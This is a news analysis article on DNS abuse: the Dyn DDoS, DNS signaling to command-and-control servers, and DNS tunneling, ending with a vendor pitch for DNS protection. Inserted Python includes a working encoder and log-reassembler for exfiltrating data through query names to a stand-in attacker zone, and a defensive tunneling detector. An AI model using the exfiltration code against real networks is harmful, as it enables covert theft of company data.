Dark Reading is part of the Informa Tech Division of Informa PLC


Infrastructure Security

01:15 PM
Ashish Gupta
News Analysis-Security Now

Closing Gaps in DNS

Everyone uses DNS. How can you prevent hackers from using it to disrupt your business?

Two of the most heavily used gateways into corporate networks are HTTP and DNS. For years, IT organizations have protected the HTTP side with firewalls, next-generation firewalls, web application firewalls, IDS/IPS sensors and application delivery controllers. HTTP is the front door, fitted with many locks and watched around the clock; DNS is the neglected back door. Thieves do not care which door they use. They want the easiest way in, and in most companies DNS provides it, because DNS is rarely treated as a threat vector at all.

Even so, DNS security has recently become more prominent, especially in the wake of the large-scale Distributed Denial of Service (DDoS) attack on the DNS provider Dyn, now an Oracle company. The October 2016 attack was launched from a botnet of compromised IoT devices (Mirai) and temporarily took down websites and cloud services such as Twitter that relied on Dyn to resolve their names to IP addresses. More recently, ransomware families such as WannaCry and Jaff also relied on DNS lookups to complete their attack chains.

These incidents exposed how vulnerable the "Internet address book" is to DDoS and how useful it is to ransomware. For this reason, companies are advised to run their own local DNS servers, keep secondary authoritative servers at their service provider and, optionally, add a DNS hosting provider such as Dyn, so that no single failure takes their names offline.

DNS as an attack vector
The domain name system is effectively an overlay network spanning the public Internet and private corporate networks. The problem is that even when one is aware of DNS's exposure, one cannot simply close port 53 with a firewall rule the way one can restrict HTTP on port 80 to a handful of proxies: every host needs name resolution, so DNS traffic has to be let through.

The possibilities for DNS abuse go well beyond flooding a DNS server with requests until it stops responding, as happened to Dyn. More sophisticated variants include botnet-driven distributed reflection DoS (DRDoS), in which spoofed queries to open resolvers are turned into DNS amplification attacks against a victim, and the malicious redirection of DNS queries through DNS hijacking or cache poisoning. The 2016 Cisco Annual Security Report found that 91.3% of malware uses DNS at some point in its attack.

Using DNS queries for attacks
There are two tricky and rarely noticed methods of using DNS against corporate networks: DNS signaling and DNS tunneling.

DNS signaling attacks
Suppose a CFO visits an Internet cafe, connects to its network and inadvertently picks up malware that compromises his corporate laptop. The malware can then use DNS signaling to communicate with its command-and-control (C&C) server and start exfiltrating critical data, or simply encrypt it and hold the CFO's files to ransom, as WannaCry did to the UK's National Health Service (NHS).

The attacker needs to set up only one name server reachable from the Internet: a basic installation of the open source DNS server BIND with query logging enabled. Malware that has reached its target network then sends a DNS request to that name server for a name that carries its message, for example: company-infiltration.c-c-server.com.

A professional malware author would of course obfuscate this message, so that instead of a readable phrase such as "company-infiltration" only a long, cryptic string appears. The attacker's domain, "c-c-server.com" in the example, can be hard-coded into the malware, but some malicious software instead carries a Domain Generation Algorithm (DGA) that computes a fresh domain to contact, so there is no fixed name to block.

The DNS resolver of the malware-infected company does not understand any of this; it simply forwards the query, via the root and TLD servers, to the authoritative name server for c-c-server.com, which the attacker controls. To anyone watching, it looks like a request for a somewhat cumbersome subdomain. On the attacker's side, the logged query name is then decoded.

The attacker has now established a covert channel that looks like harmless DNS queries and stays under the radar of many firewalls and next-generation firewalls (NGFWs) as well as intrusion detection and prevention systems (IDS/IPS). What is the harm? Data exfiltration, at the very least: the CFO's computer is now sharing data without the CFO knowing it.

Many security products offer no visibility into the DNS attack vector at all. Worse, if the malware obtains administrator rights on the compromised computer, it can change the recursive DNS server the host uses and point it at an outside resolver such as Google Public DNS or OpenDNS, bypassing the corporate resolver entirely. IT can prevent this, for example by enforcing resolver settings through group policy and allowing outbound port 53 only from the corporate resolvers, but often does not. In that case the company's own DNS server never even sees the suspicious exchange.

DNS-tunnel attack vector
DNS tunneling goes a step further: it uses DNS queries and responses to carry other protocols such as HTTP, FTP or SMTP, encoded inside DNS messages. The attackers essentially build a VPN, except that DNS is the transport, which hides the tunnel inside ordinary-looking name resolution.

Once attackers have established a DNS-based VPN, they have all the possibilities of a private tunnel. They can use FTP over it to bring remote access trojans (RATs) into the corporate network, or use it to exfiltrate data from the company. Usually none of this trips firewall rules, IDS/IPS signatures or behavior-based network monitoring, because all of it looks like DNS.

This creative use of DNS is particularly well suited to advanced persistent threats (APTs). In an APT, the attackers do not want to compromise just any network; they have a concrete goal, for example the design plans or product roadmap of a manufacturing company. Once the desired data is found, it can be exfiltrated quietly, "low and slow" or as a "slow drip", so that no load peaks appear in the network traffic that a port-independent network monitoring solution might notice.
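The two mechanisms above share one primitive: data leaves as query names, the corporate resolver forwards them to the attacker's authoritative server, and the attacker reads them back out of the query log. The Python below is an added illustration of that primitive for both the signaling case and the tunneling case; it is not code from the article or from Infoblox. It assumes an attacker zone c-c-server.example, a session label that identifies the victim, and BIND-style query log lines that are constructed here rather than captured. It covers only the upstream direction; a real tunnel also carries data back down in TXT or NULL answers.

```python
"""DNS signaling / tunneling, upstream direction: pack data into query names
that the victim's resolver forwards to the attacker's authoritative server,
then recover the data from that server's query log.
Added illustration, not code from the article. Zone, session tag and log
format are assumptions."""
import base64
import re

C2_DOMAIN = "c-c-server.example"   # assumed attacker-controlled zone
MAX_LABEL = 63                     # RFC 1035: one label is at most 63 characters
MAX_NAME = 253                     # RFC 1035: whole name in text form, at most 253
SEQ_WIDTH = 4                      # zero-padded sequence label, e.g. "0007"


def encode_chunk(data: bytes) -> str:
    """Base32 without padding, lower case: it survives case-folding resolvers
    and uses only [a-z2-7], which is legal in hostnames."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def decode_chunk(text: str) -> bytes:
    """Inverse of encode_chunk; restores the stripped '=' padding."""
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def build_queries(session: str, payload: bytes, domain: str = C2_DOMAIN) -> list:
    """Split payload into names of the form <seq>.<data labels>.<session>.<domain>,
    keeping every label <= 63 characters and every name <= 253."""
    suffix = f".{session}.{domain}"
    budget = MAX_NAME - (SEQ_WIDTH + 1) - len(suffix)      # characters left for data
    n_labels = (budget + 1) // (MAX_LABEL + 1)             # full 63-char labels that fit
    bytes_per_query = (n_labels * MAX_LABEL // 8) * 5      # base32: 5 bytes -> 8 chars
    queries = []
    for seq, start in enumerate(range(0, len(payload), bytes_per_query)):
        enc = encode_chunk(payload[start:start + bytes_per_query])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        queries.append(f"{seq:0{SEQ_WIDTH}d}." + ".".join(labels) + suffix)
    return queries


# Matches the "query: <name> IN <type>" part of a BIND 9 querylog line
# (constructed approximation; the exact prefix varies between BIND versions).
QUERY_RE = re.compile(r"query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def reassemble(log_lines, session: str, domain: str = C2_DOMAIN) -> bytes:
    """Pull one session's queries out of the log, order by sequence number
    and decode. Resolver retries overwrite identical chunks, and arrival
    order does not matter."""
    suffix = f".{session}.{domain}"
    chunks = {}
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if not qname.endswith(suffix):
            continue
        seq, _, data = qname[:-len(suffix)].partition(".")
        if not seq.isdigit():
            continue
        chunks[int(seq)] = decode_chunk(data.replace(".", ""))
    return b"".join(chunks[i] for i in sorted(chunks))


def demo_log(queries):
    """Constructed BIND-style query log lines for the given names, emitted in
    reverse order to show that reassembly does not depend on arrival order."""
    return [
        f"30-Nov-2021 13:15:{i:02d}.000 client 10.0.0.53#4{i:04d} ({q}): "
        f"query: {q} IN A + (198.51.100.7)"
        for i, q in enumerate(reversed(queries))
    ]


# Constructed payload: some text plus every byte value, to prove the round trip is exact.
SAMPLE = b"product roadmap 2018: " + bytes(range(256))
```

With the assumed zone and a session tag of "cfo-pc", each query carries 115 bytes of payload in three labels, so the 278-byte sample leaves as three queries; the resolver sees nothing but long subdomains under a domain it has never heard of. Note what this implies for detection: the registered domain is constant, the leftmost labels are never the same twice, and every one of them has the entropy of a base32 blob.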

Measures against DNS abuse
A new generation of solutions for defending against DNS-based attacks has emerged under the label "Advanced DNS Protection." They combine DNS firewalling and DNS monitoring with analytics such as DNS deep packet inspection and with automated responses that stop DNS abuse as quickly as possible.

As soon as suspicious behavior accumulates past a scoring threshold, these solutions can not only raise an alarm but intervene, for example by answering a suspicious query with NXDOMAIN or by cutting off an exfiltration in progress. They complement the existing defenses rather than replace them, so they must integrate, through APIs, with next-generation firewalls as well as with SIEM systems and incident response tools.
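What such a scoring engine looks like in miniature, as an added example (not Infoblox's product logic and not code from the article): the Python below runs a few per-client, per-domain heuristics over constructed resolver log lines that mix ordinary intranet lookups, DNSBL lookups (which also produce a new subdomain on every query) and a base32 tunnel. The log format, feature weights and thresholds are assumptions to be tuned against your own baseline.

```python
"""Score resolver query logs for DNS signaling / tunneling behaviour.
Added illustration, not Infoblox's or the article's code. The log format,
feature weights and thresholds are assumptions; tune them against a baseline."""
import base64
import hashlib
import math
from collections import defaultdict

MIN_QUERIES = 10        # ignore (client, domain) pairs with too little data
SUSPICIOUS_SCORE = 4    # score at which a pair is reported


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 or hex blobs score far above dictionary words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def parse_line(line: str):
    """Constructed log format (assumption): <timestamp> <client> <qname> <qtype> <rcode>."""
    _ts, client, qname, qtype, rcode = line.split()
    return client, qname.rstrip(".").lower(), qtype.upper(), rcode.upper()


def split_name(qname: str):
    """Registered domain = last two labels (assumption; a real deployment would
    consult the Public Suffix List so that names under e.g. co.uk split correctly)."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return qname, ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyze(lines):
    """Return {(client, domain): (score, reasons)} for pairs with enough queries."""
    stats = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0, "txt": 0})
    for line in lines:
        client, qname, qtype, _rcode = parse_line(line)
        domain, sub = split_name(qname)
        s = stats[(client, domain)]
        s["n"] += 1
        s["subs"].add(sub)
        s["len"] += len(sub)
        s["ent"] += shannon_entropy(sub.replace(".", ""))
        s["txt"] += qtype in ("TXT", "NULL")     # rdata-rich types favoured by tunnels
    results = {}
    for key, s in stats.items():
        n = s["n"]
        if n < MIN_QUERIES:
            continue
        checks = [   # (condition, weight, reason); weights are assumptions
            (len(s["subs"]) / n > 0.8, 2, "a new subdomain on almost every query"),
            (s["len"] / n > 40, 2, "unusually long subdomains"),
            (s["ent"] / n > 3.5, 2, "high-entropy labels"),
            (s["txt"] / n > 0.5, 1, "mostly TXT/NULL queries"),
        ]
        score = sum(w for hit, w, _ in checks if hit)
        results[key] = (score, [r for hit, _, r in checks if hit])
    return results


def suspicious(lines):
    """(client, domain) pairs that cross the reporting threshold."""
    return sorted(k for k, (score, _) in analyze(lines).items() if score >= SUSPICIOUS_SCORE)


def constructed_log():
    """Constructed sample: intranet lookups, DNSBL lookups (high cardinality but
    short and low-entropy) and a base32 tunnel, all from one client."""
    lines = []
    for i in range(30):
        host = ("www", "mail", "sso", "intranet")[i % 4]
        lines.append(f"2017-06-01T09:00:{i:02d} 10.0.0.23 {host}.corp.example A NOERROR")
    for i in range(30):
        lines.append(f"2017-06-01T09:01:{i:02d} 10.0.0.23 "
                     f"{i % 256}.{(37 * i) % 256}.0.203.dnsbl.example A NXDOMAIN")
    for i in range(30):
        blob = hashlib.sha256(f"chunk{i}".encode()).digest()   # stands in for exfiltrated bytes
        label = base64.b32encode(blob).decode().rstrip("=").lower()
        qtype = "TXT" if i % 4 else "A"
        lines.append(f"2017-06-01T09:02:{i:02d} 10.0.0.23 "
                     f"{i:04d}.{label}.c-c-server.example {qtype} NOERROR")
    return lines
```

The point of weighting several features is visible in the sample: the DNSBL traffic trips the "new subdomain on every query" check alone and stops at a score of 2, while the tunnel trips cardinality, length, entropy and query type together. A DGA-driven host would need a different key, since each of its domains is queried only once; counting NXDOMAIN answers per client, rather than per domain, is the usual complement.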

No more blinders
IT organizations have so far put too much emphasis on the prominent HTTP attack vector when protecting their networks. The front door has been reinforced and guarded with every available means, but the back door, DNS, is not even locked. It often serves as a convenient staff entrance that unwanted visitors use as well. DNS tunneling in particular has established itself as a long-neglected and therefore extremely effective route for introducing malware and exfiltrating internal data. It is high time to close this back door. Attackers are surprisingly flexible in their choice of entry route, and far too successful. Organizations have to be as intelligent and proactive about DNS as they are about the front entrance.

As EVP and CMO at Infoblox, Ashish Gupta drives strategy for global corporate and product marketing at Infoblox. Previously, he held leadership positions at Action, Vidyo, Microsoft, Alcatel/Genesys Telecommunications, Telera, Deloitte Consulting and Hewlett-Packard.
